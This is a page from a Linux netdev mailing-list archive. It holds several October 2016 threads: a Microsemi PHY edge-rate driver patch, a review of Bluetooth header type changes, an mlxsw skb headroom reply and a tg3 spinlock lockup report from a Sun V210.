+   unicast = nla_data(info->attrs[NL80211_ATTR_UNICAST]);


What's this supposed to mean?


this was supposed to be nla_get_u8.

michael


[PATCH v8 net-next] net: phy: Add Edge-rate driver for Microsemi PHYs.

2016-10-05 Thread Raju Lakkaraju
From: Raju Lakkaraju 

Edge-rate:
As system and networking speeds increase, a signal's output transition,
also know as the edge rate or slew rate (V/ns), takes on greater importance
because high-speed signals come with a price. That price is an assortment of
interference problems like ringing on the line, signal overshoot and
undershoot, extended signal settling times, crosstalk noise, transmission
line reflections, false signal detection by the receiving device and
electromagnetic interference (EMI) -- all of which can negate the potential
gains designers are seeking when they try to increase system speeds through
the use of higher performance logic devices. The fact is, faster signaling
edge rates can cause a higher level of electrical noise or other type of
interference that can actually lead to slower line speeds and lower maximum
system frequencies. This parameter allow the board designers to change the
driving strange, and thereby change the EMI behavioral.

Edge-rate parameters (vddmac, edge-slowdown) get from Device Tree.

Tested on Beaglebone Black with VSC 8531 PHY.

Signed-off-by: Raju Lakkaraju 

---
All the review comments updated and resending for review.

Change set:
v1:
- Initial version of Edge-rate driver add by using IOCTL.
v2:
- Changed edge-rate parameter to Device Tree with magic number.
v3:
- Added Device Tree documentati0n and edge-rate parameter table.
  Added probe function initialize the vsc8531 private data structure.
v4:
- As per review comment, Device Tree parameters (vddmac, edge-slowdown)
  added.
v5:
- As per review comment, Device Tree Document parameters (vddmac, 
  edge-slowdown) real numbers added. Table number changed from 5 to 1.
v6:
- As per review comment, Removed Device Tree header file. Removed MACROs
  and add ARRAYSIZE
v7:
- As per review comment, Removed '-'s (minus) sign in Edge rate table. 
v8:
- As per review comment, Added DT vddmac, slowdown value error check. 

---

 .../devicetree/bindings/net/mscc-phy-vsc8531.txt   | 22 +++
 drivers/net/phy/mscc.c | 69 +++---
 include/dt-bindings/net/mscc-phy-vsc8531.h | 21 ---
 3 files changed, 59 insertions(+), 53 deletions(-)
 delete mode 100644 include/dt-bindings/net/mscc-phy-vsc8531.h

diff --git a/Documentation/devicetree/bindings/net/mscc-phy-vsc8531.txt 
b/Documentation/devicetree/bindings/net/mscc-phy-vsc8531.txt
index 99c7eb0..1173498 100644
--- a/Documentation/devicetree/bindings/net/mscc-phy-vsc8531.txt
+++ b/Documentation/devicetree/bindings/net/mscc-phy-vsc8531.txt
@@ -8,8 +8,7 @@ Required properties:
 Optional properties:
 - vsc8531,vddmac   : The vddmac in mV.
 - vsc8531,edge-slowdown: % the edge should be slowed down relative to
- the fastest possible edge time. Native sign
- need not enter.
+ the fastest possible edge time.
  Edge rate sets the drive strength of the MAC
  interface output signals.  Changing the drive
  strength will affect the edge rate of the output
@@ -18,7 +17,8 @@ Optional properties:
  to reprogram drive strength and in effect slow
  down the edge rate if desired.  Table 1 shows the
  impact to the edge rate per VDDMAC supply for each
- drive strength setting.
+ drive strength setting. VDDMAC supply voltage
+ should be one of the value in Table-1 first row.
  Ref: Table:1 - Edge rate change below.
 
 Note: see dt-bindings/net/mscc-phy-vsc8531.h for applicable values
@@ -29,23 +29,25 @@ Table: 1 - Edge rate change
 |  |
 | 3300 mV  2500 mV 1800 mV 1500 mV |
 |---|
+| 0%   0%  0%  0%  |
+|  |
 | Default  Deafult Default Default |
 | (Fastest)(recommended)   (recommended)   |
 |---|
-| -2%  -3% -5% -6% |
+| 2%   3%  5%  6%  |
 |---|
-| -4%  -6% -9% -14%|
+| 4%   6%  9%  14% |
 |---|
-| -7%  -10%-16%-21%|
+| 7%   10% 16% 21% |
 |(recommended) (recommended)   |
 |---|
-| -10% -14%

Re: [PATCH] bluetooth.h: __ variants of u8 and friends are not neccessary inside kernel

2016-10-05 Thread Marcel Holtmann
Hi Pavel,

> bluetooth.h is not part of user API, so __ variants are not neccessary
> here.
> 
> Signed-off-by: Pavel Machek 
> 
> diff --git a/include/net/bluetooth/bluetooth.h 
> b/include/net/bluetooth/bluetooth.h
> index bfd1590..aea0371 100644
> --- a/include/net/bluetooth/bluetooth.h
> +++ b/include/net/bluetooth/bluetooth.h
> @@ -60,8 +60,8 @@
> 
> #define BT_SECURITY   4
> struct bt_security {
> - __u8 level;
> - __u8 key_size;
> + u8 level;
> + u8 key_size;
> };
> #define BT_SECURITY_SDP   0
> #define BT_SECURITY_LOW   1
> @@ -78,7 +78,7 @@ struct bt_security {
> 
> #define BT_POWER  9
> struct bt_power {
> - __u8 force_active;
> + u8 force_active;
> };
> #define BT_POWER_FORCE_ACTIVE_OFF 0
> #define BT_POWER_FORCE_ACTIVE_ON  1
> @@ -112,7 +112,7 @@ struct bt_power {
> 
> #define BT_VOICE  11
> struct bt_voice {
> - __u16 setting;
> + u16 setting;
> };
> 
> #define BT_VOICE_TRANSPARENT  0x0003
> @@ -188,7 +188,7 @@ static inline const char *state_to_string(int state)
> 
> /* BD Address */
> typedef struct {
> - __u8 b[6];
> + u8 b[6];
> } __packed bdaddr_t;
> 

can you leave these out please. They are meant to become UAPI eventually.

> /* BD Address type */
> @@ -196,7 +196,7 @@ typedef struct {
> #define BDADDR_LE_PUBLIC  0x01
> #define BDADDR_LE_RANDOM  0x02
> 
> -static inline bool bdaddr_type_is_valid(__u8 type)
> +static inline bool bdaddr_type_is_valid(u8 type)
> {
>   switch (type) {
>   case BDADDR_BREDR:
> @@ -208,7 +208,7 @@ static inline bool bdaddr_type_is_valid(__u8 type)
>   return false;
> }
> 
> -static inline bool bdaddr_type_is_le(__u8 type)
> +static inline bool bdaddr_type_is_le(u8 type)
> {
>   switch (type) {
>   case BDADDR_LE_PUBLIC:
> @@ -278,15 +278,16 @@ struct sock *bt_accept_dequeue(struct sock *parent, 
> struct socket *newsock);
> 
> /* Skb helpers */
> struct l2cap_ctrl {
> - __u8sframe:1,
> + u8  sframe:1,
>   poll:1,
>   final:1,
>   fcs:1,
>   sar:2,
>   super:2;
> - __u16   reqseq;
> - __u16   txseq;
> - __u8retries;
> +
> + u16 reqseq;
> + u16 txseq;
> + u8  retries;
>   __le16  psm;
>   bdaddr_t bdaddr;
>   struct l2cap_chan *chan;
> @@ -302,7 +303,7 @@ typedef void (*hci_req_complete_skb_t)(struct hci_dev 
> *hdev, u8 status,
> #define HCI_REQ_SKB   BIT(1)
> 
> struct hci_ctrl {
> - __u16 opcode;
> + u16 opcode;
>   u8 req_flags;
>   u8 req_event;
>   union {
> @@ -312,10 +313,10 @@ struct hci_ctrl {
> };
> 
> struct bt_skb_cb {
> - __u8 pkt_type;
> - __u8 force_active;
> - __u16 expect;
> - __u8 incoming:1;
> + u8 pkt_type;
> + u8 force_active;
> + u16 expect;
> + u8 incoming:1;
>   union {
>   struct l2cap_ctrl l2cap;
>   struct hci_ctrl hci;
> @@ -365,7 +366,7 @@ out:
>   return NULL;
> }
> 
> -int bt_to_errno(__u16 code);
> +int bt_to_errno(u16 code);

The rest looks good to me.

Regards

Marcel



Re: [patch net 0/2] mlxsw: Couple of fixes

2016-10-05 Thread Jiri Pirko
Wed, Oct 05, 2016 at 02:29:27AM CEST, da...@davemloft.net wrote:
>From: Jiri Pirko 
>Date: Tue,  4 Oct 2016 09:46:03 +0200
>
>> Couple of fixes from Yotam.
>
>Series applied, thanks.
>
>Note that needed_headroom is a request, rather than a guarantee, so you
>may in some rare cases need to realloc your headroom if the kernel was
>not able to meet your request.

We already do that: 

if (unlikely(skb_headroom(skb) < MLXSW_TXHDR_LEN)) {
struct sk_buff *skb_orig = skb;

skb = skb_realloc_headroom(skb, MLXSW_TXHDR_LEN);
if (!skb) {
this_cpu_inc(mlxsw_sp_port->pcpu_stats->tx_dropped);
dev_kfree_skb_any(skb_orig);
return NETDEV_TX_OK;
}
}



tg3 BUG: spinlock lockup suspected

2016-10-05 Thread Meelis Roos
I am testing 4.8 on my sparcs and got this on Sun V210 (sparc64). This 
is reproducible. 4.8.0-rc3-00013 did not have this problem, will bisect 
when I get some time.

[   74.123859] tg3.c:v3.137 (May 11, 2014)
[   74.123880] PCI: Enabling device: (:00:02.0), cmd 2
[   74.315794] tg3 :00:02.0 (unnamed net_device) (uninitialized): Cannot 
get nvram lock, tg3_nvram_init failed
[   74.656152] tg3 :00:02.0 eth0: Tigon3 [partno(none) rev 2003] 
(PCI:66MHz:64-bit) MAC address 00:03:ba:0a:f3:85
[   74.656160] tg3 :00:02.0 eth0: attached PHY is 5704 (10/100/1000Base-T 
Ethernet) (WireSpeed[1], EEE[0])
[   74.656167] tg3 :00:02.0 eth0: RXcsums[1] LinkChgREG[0] MIirq[0] ASF[0] 
TSOcap[1]
[   74.656172] tg3 :00:02.0 eth0: dma_rwctrl[763f] dma_mask[32-bit]
[   74.656322] PCI: Enabling device: (:00:02.1), cmd 2
[   74.845325] tg3 :00:02.1 (unnamed net_device) (uninitialized): Cannot 
get nvram lock, tg3_nvram_init failed
[   75.184539] tg3 :00:02.1 eth1: Tigon3 [partno(none) rev 2003] 
(PCI:66MHz:64-bit) MAC address 00:03:ba:0a:f3:86
[   75.184546] tg3 :00:02.1 eth1: attached PHY is 5704 (10/100/1000Base-T 
Ethernet) (WireSpeed[1], EEE[0])
[   75.184551] tg3 :00:02.1 eth1: RXcsums[1] LinkChgREG[0] MIirq[0] ASF[0] 
TSOcap[1]
[   75.184557] tg3 :00:02.1 eth1: dma_rwctrl[763f] dma_mask[32-bit]
[   75.184708] PCI: Enabling device: (0003:00:02.0), cmd 2
[   75.375322] tg3 0003:00:02.0 (unnamed net_device) (uninitialized): Cannot 
get nvram lock, tg3_nvram_init failed
[   75.714681] tg3 0003:00:02.0 eth2: Tigon3 [partno(none) rev 2003] 
(PCI:66MHz:64-bit) MAC address 00:03:ba:0a:f3:87
[   75.714688] tg3 0003:00:02.0 eth2: attached PHY is 5704 (10/100/1000Base-T 
Ethernet) (WireSpeed[1], EEE[0])
[   75.714694] tg3 0003:00:02.0 eth2: RXcsums[1] LinkChgREG[0] MIirq[0] ASF[0] 
TSOcap[1]
[   75.714699] tg3 0003:00:02.0 eth2: dma_rwctrl[763f] dma_mask[32-bit]
[   75.714819] PCI: Enabling device: (0003:00:02.1), cmd 2
[   75.905278] tg3 0003:00:02.1 (unnamed net_device) (uninitialized): Cannot 
get nvram lock, tg3_nvram_init failed
[   76.244470] tg3 0003:00:02.1 eth3: Tigon3 [partno(none) rev 2003] 
(PCI:66MHz:64-bit) MAC address 00:03:ba:0a:f3:88
[   76.244477] tg3 0003:00:02.1 eth3: attached PHY is 5704 (10/100/1000Base-T 
Ethernet) (WireSpeed[1], EEE[0])
[   76.244482] tg3 0003:00:02.1 eth3: RXcsums[1] LinkChgREG[0] MIirq[0] ASF[0] 
TSOcap[1]
[   76.244488] tg3 0003:00:02.1 eth3: dma_rwctrl[763f] dma_mask[32-bit]
[   83.643317] tg3 :00:02.0 eth0: No firmware running
[...]
[   83.716570] BUG: spinlock lockup suspected on CPU#0, dhclient/1014
[   83.797819]  lock: 0xfff000123c8e4a08, .magic: dead4ead, .owner: ip/1001, 
.owner_cpu: 1
[   83.903130] CPU: 0 PID: 1014 Comm: dhclient Not tainted 4.8.0 #4
[   83.982129] Call Trace:
[   84.014160]  [004b7220] spin_dump+0x60/0xa0
[   84.078203]  [004b73a0] do_raw_spin_lock+0xa0/0x120
[   84.106344] IPv6: ADDRCONF(NETDEV_UP): eth0: link is not ready
[   84.107193] ip (1001) used greatest stack depth: 2168 bytes left
[   84.306955]  [0092c0d0] _raw_spin_lock_bh+0x30/0x40
[   84.380188]  [100822cc] tg3_get_stats64+0xc/0x80 [tg3]
[   84.456885]  [007fac8c] dev_get_stats+0x2c/0xc0
[   84.525506]  [0081a4e8] dev_seq_printf_stats+0x8/0xe0
[   84.600986]  [0081a5e4] dev_seq_show+0x24/0x40
[   84.668467]  [005cb6c4] seq_read+0x2c4/0x440
[   84.733656]  [0060b97c] proc_reg_read+0x3c/0x80
[   84.802282]  [005a219c] __vfs_read+0x1c/0x140
[   84.868613]  [005a2310] vfs_read+0x50/0x100
[   84.932662]  [005a265c] SyS_read+0x3c/0xa0
[   84.995573]  [004061d4] linux_sparc_syscall32+0x34/0x60
[   85.073748] * CPU[  0]: TSTATE[0044f0001a22] TPC[f79a16b0] 
TNPC[f79a16b4] TASK[dhclient:1014]
[   85.208732]  TPC[f79a16b0] O7[f79405c8] I7[0] RPC[0]
[   85.287633]   CPU[  1]: TSTATE[004480001605] TPC[004b26f0] 
TNPC[004d0b0c] TASK[swapper/1:0]
[   85.420338]  TPC[trace_hardirqs_off+0x10/0x20] 
O7[rcu_idle_enter+0x64/0xa0] I7[cpu_startup_entry+0x1b0/0x240] 
RPC[rest_init+0x178/0x1a0]
[   85.664600] tg3 :00:02.0 eth0: Link is up at 100 Mbps, full duplex
[   85.750515] tg3 :00:02.0 eth0: Flow control is off for TX and off for RX
[   85.843994] IPv6: ADDRCONF(NETDEV_CHANGE): eth0: link becomes ready

-- 
Meelis Roos (mr...@linux.ee)


  1   2   >